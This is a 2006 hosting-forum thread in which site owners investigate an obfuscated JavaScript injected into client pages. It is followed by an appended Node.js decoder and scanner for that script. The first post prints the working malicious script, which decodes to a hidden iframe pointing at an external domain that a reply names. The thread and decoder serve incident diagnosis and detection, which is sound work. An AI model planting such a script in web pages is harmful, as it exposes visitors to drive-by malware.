The Community Forums

Interact with an entire community of cPanel & WHM users!

How did this javascript get in...

Discussion in 'General Discussion' started by kre8web, Jun 23, 2006.

  1. kre8web (Active Member)

    On the 17th of this month a couple of clients reported that a dialler had started popping up on their sites. A closer look revealed the following javascript had been added and hidden at the bottom of the page.

    <script language="JavaScript">
    e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
    </script>

    Now my question is how have they managed to get this javascript onto the page? I'm presuming there's either been a server or security issue somewhere, however one of the affected sites uses no scripting outside of a password-protected CMS. Any thoughts would be greatly appreciated :)
     
  2. chirpy (Well-Known Member)

  3. kre8web (Active Member)

    Hmm, the problem is that the server in question is not one I have root access to; indeed it's a 3rd party host who are refusing to accept responsibility. They keep suggesting it's a security hole in one of the scripts running on the site, which I mean is quite possible I guess, however the same scripts are running on over 14 other sites on different servers and hosts without problem. The server is cPanel based so I'm going to try disabling enable_dl via htaccess in the root and see if that solves it.
     
  4. richy (Well-Known Member)

    We've seen this as well recently - IIRC the user in question hadn't updated their antivirus in over 3 months and had recently made changes to the "infected pages", which indicates a virus is changing HTML pages on their hard drives and when they update their site.. Boom!
     
  5. reliableDerrick (Registered, PartnerNOC)

    After I figured out how to decode the javascript there (replace document.write with alert), it turns out to be some html for a hidden iframe going to dnv-counter.com/trf, and while the site isn't up now, I don't recommend anyone try to visit it. Google hasn't turned up many results, and it seems like anti-virus programs aren't detecting the virus:

    http://www.castlecops.com/postx160127-0-0.html
    http://forums.pcapex.com/windows_os_problems/79078-what_the_hell_is_23100247_exe.html

    I'm not sure if the second one is the same sort of infection (they were less subtle about making those iframes before), but it seems like the same basic principle. My best guess at the moment is that they're either inserting the javascript into the pages as they're being uploaded, or catching the FTP usernames and passwords, sending them back to the central server, and then uploading modified files themselves.

    Could someone who's had their html files infected run task manager and see if you have any weird processes like c:\23423523.exe running, like in the pcapex thread?
     
    #5 reliableDerrick, Jul 23, 2006
    Last edited: Jul 23, 2006
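An added example, not code from this thread nor by anyone posting in it, that does offline what reliableDerrick describes: it reproduces the decoding loop of the script quoted in kre8web's first post in Node.js, without document.write or a browser, so the markup the script would have injected can be read rather than rendered. It also scans a page for script blocks of this family and reports whether the decoded output is a hidden iframe and where it points. The names decodePayload, extractInjected, STR1 and SAMPLE_PAGE and the regular expressions are chosen here; the HTML around the script is constructed for the example, while the encoded payload is the one quoted in the first post.

```javascript
// Added example (not from the thread): offline decoder and scanner for the
// obfuscated <script> block quoted in the first post. The transform is the
// script's own: for each %XX triplet, (byte XOR key) - 127. Nothing here
// executes the script or calls document.write. SAMPLE_PAGE is constructed.

// The injected script computes e = '0x00' + '22', i.e. the *string* '0x0022';
// the ^ operator coerces that to the number 0x22 (34). We take a numeric key.
function decodePayload(encoded, key = 0x22) {
  let out = '';
  for (let i = 0; i < encoded.length; i += 3) {
    const triplet = encoded.slice(i, i + 3); // e.g. '%99'
    if (triplet.length !== 3 || triplet[0] !== '%') {
      throw new Error(`malformed %XX triplet at offset ${i}: ${JSON.stringify(triplet)}`);
    }
    const byte = parseInt(triplet.slice(1), 16); // what unescape('%XX') yields
    if (Number.isNaN(byte)) throw new Error(`bad hex at offset ${i}`);
    out += String.fromCharCode((byte ^ key) - 127);
  }
  return out;
}

// Signature of this family: a key built as '0x00' + 'XX', a str1 made only of
// %XX triplets, and document.write() of the decoded result.
const KEY_RE = /\be\s*=\s*'0x00'\s*\+\s*'([0-9a-fA-F]{2})'/;
const PAYLOAD_RE = /\bstr1\s*=\s*"((?:%[0-9a-fA-F]{2})+)"/;

// Scan one HTML document; return a finding per matching <script> block with
// the decoded markup and the facts an analyst wants first.
function extractInjected(html) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi; // fresh per call (lastIndex)
  const findings = [];
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const keyMatch = KEY_RE.exec(body);
    const payloadMatch = PAYLOAD_RE.exec(body);
    if (!keyMatch || !payloadMatch) continue;
    const decoded = decodePayload(payloadMatch[1], parseInt(keyMatch[1], 16));
    const src = /<iframe\b[^>]*\bsrc\s*=\s*"([^"]*)"/i.exec(decoded);
    findings.push({
      offset: m.index,
      usesDocumentWrite: /document\.write\s*\(/.test(body),
      decoded,
      hiddenIframe: /<iframe\b/i.test(decoded) &&
        /visibility\s*:\s*hidden|display\s*:\s*none/i.test(decoded),
      iframeSrc: src ? src[1] : null,
    });
  }
  return findings;
}

// The encoded payload exactly as quoted in the first post.
const STR1 = '%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB';

// Constructed page carrying that script at the bottom, as on an infected file.
const SAMPLE_PAGE = [
  '<html><body><h1>Welcome</h1>',
  '<script language="JavaScript">',
  "e = '0x00' + '22';str1 = \"" + STR1 + "\";str=tmp='';" +
    "for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));" +
    "str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);",
  '</script>',
  '</body></html>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of extractInjected(SAMPLE_PAGE)) {
    console.log(`script at offset ${f.offset}: hiddenIframe=${f.hiddenIframe} src=${f.iframeSrc}`);
    console.log(JSON.stringify(f.decoded)); // the markup the script would have written
  }
}
```

Run with node to print the decoded markup. Pointing extractInjected at files copied out of a web root gives a quick triage of which pages carry this injection and where the iframe points, without ever rendering them; a page that decodes to an iframe with visibility:hidden and a 1x1 size is the case this thread is about.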